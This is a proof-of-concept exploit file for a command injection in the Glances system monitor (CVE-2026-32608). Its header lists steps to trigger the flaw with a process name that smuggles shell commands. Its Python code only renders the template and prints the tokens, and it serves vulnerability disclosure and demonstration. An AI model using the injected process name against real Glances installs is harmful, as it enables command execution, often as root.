#!/usr/bin/env python3
# Exploit Title: Glances <= 4.5.2 OS Command Injection via Mustache Template Fields
# CVE: CVE-2026-32608
# Date: 2026-03-18
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://github.com/nicolargo/glances
# Software Link: https://pypi.org/project/glances/
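# Affected: Glances <= 4.5.2-dev01 (pip / source installs); the "<= 4.5.2" in the title presumably means these pre-release builds, since 4.5.2 is listed below as the fixed release (verify against the vendor advisory)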
# Tested on: Glances 4.5.1
# Category: Remote
# Platform: Linux / macOS / Windows (where Glances runs)
# Exploit Type: Command Injection
# CVSS: 7.0 (High)
# Description: Glances insecurely substitutes user-controlled values (process names, container names, mount points) into the Mustache templates used in action commands. Because the template is rendered before the secure_popen splitting logic runs, the |, && and > characters inside a malicious entity name are treated as command separators, which allows arbitrary OS command injection.
# Fixed in: Glances 4.5.2 (commit 6f4ec53d967478e69917078e6f73f448001bf107)
# Usage:
# python3 exploit.py
#
# Examples:
# python3 exploit.py
#
# Options:
# -- (no command-line options implemented in this minimal PoC)
#
# Notes:
# • Requires Glances to be running with a config containing action commands using {{name}}, {{container_name}} etc.
# • Attacker must be able to create/rename processes or Docker containers on the target system.
# • Executes commands as the user running Glances (often root when run as service)
#
# How to Use
#
# Step 1:
# Install vulnerable version: pip install "glances<4.5.2"
#
# Step 2:
# Create glances.conf with e.g.:
# [processlist]
# critical_action=echo "ALERT: {{name}}" >> /tmp/alert.log
#
# Step 3:
# Run Glances: glances --config glances.conf
#
# Step 4:
# Create malicious process:
# cp /bin/sleep "/tmp/ok|id>/tmp/pwned;whoami>>/tmp/pwned||"
# "/tmp/ok|id>/tmp/pwned;whoami>>/tmp/pwned||" 999 &
#
# Step 5:
# Wait for Glances to evaluate process list and trigger action
import subprocess
import shlex
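def vulnerable_secure_popen(cmd: str):
    """Print the tokens a naive separator split produces for *cmd*.

    Print-only stand-in for the splitting step named in the file header:
    ``&&``, ``|`` and ``>`` are padded with spaces, the string is split on
    whitespace, and every token is printed with an ``[EXEC]`` prefix.
    Nothing is executed and nothing is returned.

    The point to read off the output: once a value has been substituted
    into the command string, separators that came from that value cannot
    be told apart from separators the operator wrote in the template.
    Quoting is not honoured either, because the split is on whitespace
    only, and ``;`` is not in the separator list, so it stays inside
    whatever token it appears in.

    NOTE(review): this function was written for this PoC and is not the
    Glances implementation; compare with ``secure_popen`` in the affected
    release before relying on the exact tokenisation shown here.

    Args:
        cmd: The already-rendered action command string.
    """
    # Pad each separator so the whitespace split isolates it as its own token.
    for sep in ("&&", "|", ">"):
        cmd = cmd.replace(sep, f" {sep} ")
    # str.split() with no argument already discards empty fields and
    # surrounding whitespace, so no extra strip/filter pass is needed.
    for part in cmd.split():
        print(f"[EXEC] {part}")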
# Constructed sample of an attacker-chosen process name; the separator
# characters embedded in it are what the demonstration is about.
malicious_name = 'innocent|id>/tmp/pwned;whoami>>/tmp/pwned||'

# Action command in the form an operator would put in glances.conf.
template = 'echo "ALERT: {{name}} used 99% CPU" >> /tmp/alerts.log'

# Plain text substitution: the name is copied into the command verbatim,
# with no escaping or validation of its contents.
rendered = malicious_name.join(template.split('{{name}}'))
print(f"Rendered command: {rendered}")

# Print-only: lists the tokens the split yields. Tokens that originate from
# the name appear alongside those from the template, which is the defect.
vulnerable_secure_popen(rendered)